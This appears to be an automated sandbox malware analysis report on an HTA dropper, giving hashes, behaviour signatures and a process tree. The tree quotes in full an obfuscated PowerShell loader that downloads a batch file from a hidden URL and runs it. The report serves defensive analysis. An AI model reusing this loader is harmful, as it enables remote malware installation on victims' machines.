Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    07-05-2024 08:52

General

  • Target

    07052024_0852_loco.hta

  • Size

    10KB

  • MD5

    9da72d990f0df4b01314b03d824ca97c

  • SHA1

    97166c7480ff92b62469c7eb00390ae294c52fc4

  • SHA256

    19ef64886918d56e1492d010d949d71d5a028d6bc10ed0eee90fc141e491eff3

  • SHA512

    c61957008dcc7bb4fb8555f5fba726a0ce194e6b8692a8f7613977c5526ae8af09510b990e6c600f8e86e97d85c5d72d27a0dd3e55540969f637936f5e3dca78

  • SSDEEP

    192:+oTPT8cVkmolsIqZAsAsIqxEMTPgdlsIqTEbLzpIHuFqbubzAvu2/kKgnkBUR/Uv:N7T8Ykmo6LF7gd6iLzprKgkBU1Uo5NEf

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\07052024_0852_loco.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lZXTF($MqxHxcIwZRg, $fMGMwSEz){[IO.File]::WriteAllBytes($MqxHxcIwZRg, $fMGMwSEz)};function cQjjTlSPNjckyoDbV($MqxHxcIwZRg){if($MqxHxcIwZRg.EndsWith((rDpQCbMTIHrJEESV @(37059,37113,37121,37121))) -eq $True){rundll32.exe $MqxHxcIwZRg }elseif($MqxHxcIwZRg.EndsWith((rDpQCbMTIHrJEESV @(37059,37125,37128,37062))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $MqxHxcIwZRg}elseif($MqxHxcIwZRg.EndsWith((rDpQCbMTIHrJEESV @(37059,37122,37128,37118))) -eq $True){misexec /qn /i $MqxHxcIwZRg}else{Start-Process $MqxHxcIwZRg}};function YqocGdWfMuMwhiqJf($qFOOjapXQLebGJeJ){$OaxOyPNhKDHOQmaQieN = New-Object (rDpQCbMTIHrJEESV @(37091,37114,37129,37059,37100,37114,37111,37080,37121,37118,37114,37123,37129));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$fMGMwSEz = $OaxOyPNhKDHOQmaQieN.DownloadData($qFOOjapXQLebGJeJ);return $fMGMwSEz};function rDpQCbMTIHrJEESV($zDGp){$QzFqSsEGlhm=37013;$SHsugb=$Null;foreach($rhEfSaHelNsbvfGI in $zDGp){$SHsugb+=[char]($rhEfSaHelNsbvfGI-$QzFqSsEGlhm)};return $SHsugb};function lhPsZvpGwWhdT(){$SXnxmHWBJ = $env:AppData + '\';$VkozC = $SXnxmHWBJ + 'loco.bat'; if (Test-Path -Path $VkozC){cQjjTlSPNjckyoDbV $VkozC;}Else{ $STrXWIbiRPl = YqocGdWfMuMwhiqJf (rDpQCbMTIHrJEESV @(37117,37129,37129,37125,37128,37071,37060,37060,37115,37118,37113,37114,37121,37118,37129,37134,37058,37115,37121,37124,37124,37127,37118,37123,37116,37118,37123,37112,37059,37112,37124,37122,37060,37121,37124,37112,37124,37059,37111,37110,37129));lZXTF $VkozC $STrXWIbiRPl;cQjjTlSPNjckyoDbV $VkozC;};;;;}lhPsZvpGwWhdT;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2112

Network

MITRE ATT&CK Enterprise v15
